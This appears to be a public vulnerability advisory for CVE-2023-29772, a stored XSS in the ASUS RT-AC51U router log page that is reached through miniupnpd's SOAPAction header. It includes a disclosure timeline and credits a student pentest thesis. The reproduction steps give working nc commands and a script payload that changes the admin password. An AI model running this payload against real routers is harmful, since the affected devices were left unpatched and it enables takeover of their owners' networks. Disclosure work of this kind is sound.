# xss_rtac51u_syslog

Cross-site scripting (XSS) vulnerability in the System Log/General Log page of the administrator web UI in ASUS RT-AC51U wireless router firmware version up to and including 3.0.0.4.380.8591 allows remote attackers to inject arbitrary web script or HTML via a malicious network request to the miniupnpd service.

Affects firwmare versions up to and including ASUS RT-AC51U 3.0.0.4.380.8591

Assigned CVE-2023-29772

## Prerequisites

Attacker must be connected to the LAN of the wireless router.

## Steps to reproduce

1.  Find service port for miniupnpd by querying UDP port 1900:
  ```
  PORT=$(echo -e 'M-SEARCH * HTTP/1.1\r\nST: upnp:rootdevice\r\n\r\n' | nc 192.168.1.1 1900 -u | head -n7 | grep -i -oP '^location: http://192.168.1.1:\K.*?/' --line-buffered | sed -u 's#/##g')
  ```
2. Inject the XSS payload into the ```syslog.log``` file by abusing SOAPAction header. This will cause a message of type ```LOG_NOTICE``` in ```syslog.log``` containing the user controlled input.

  ```
  echo -e "POST /ctl/CmnIfCfg HTTP /1.1\r\nSOAPAction: \"urn:schemas-upnp-org:service: WANCommonInterfaceConfig :1# </textarea><script>fetch('http://router.asus.com/start_apply.htm', {method: 'POST', body: 'action_mode=apply&action_script=saveNvram&http_username=admin&http_passwd=hax123' });</script><textarea>\"\r\n\r\n" | nc 192.168.1.1 $PORT -v
  ```
3. Upon accessing the System Log/General Log page from the administrator web UI, the above JavaScript payload will be executed. In this example the password will be changed to a user controlled password. Other example attacks include exfiltrating the plaintext admin password, exposing the telnet service for remote code execution, exposing the administrator web UI to the WAN, etc.

## Timeline

- 2022-04-13 Discovered
- 2022-05-18 Notified Asus
- 2022-05-23 Acknowledged, WONTFIX due to device end-of-life
- 2023-03-09 Report made public

## Credit

Ida Heggen Trosdahl, Jørgen Selsøyvold, Donn Morrison

Pentest bachelor thesis IDI/NTNU spring 2022
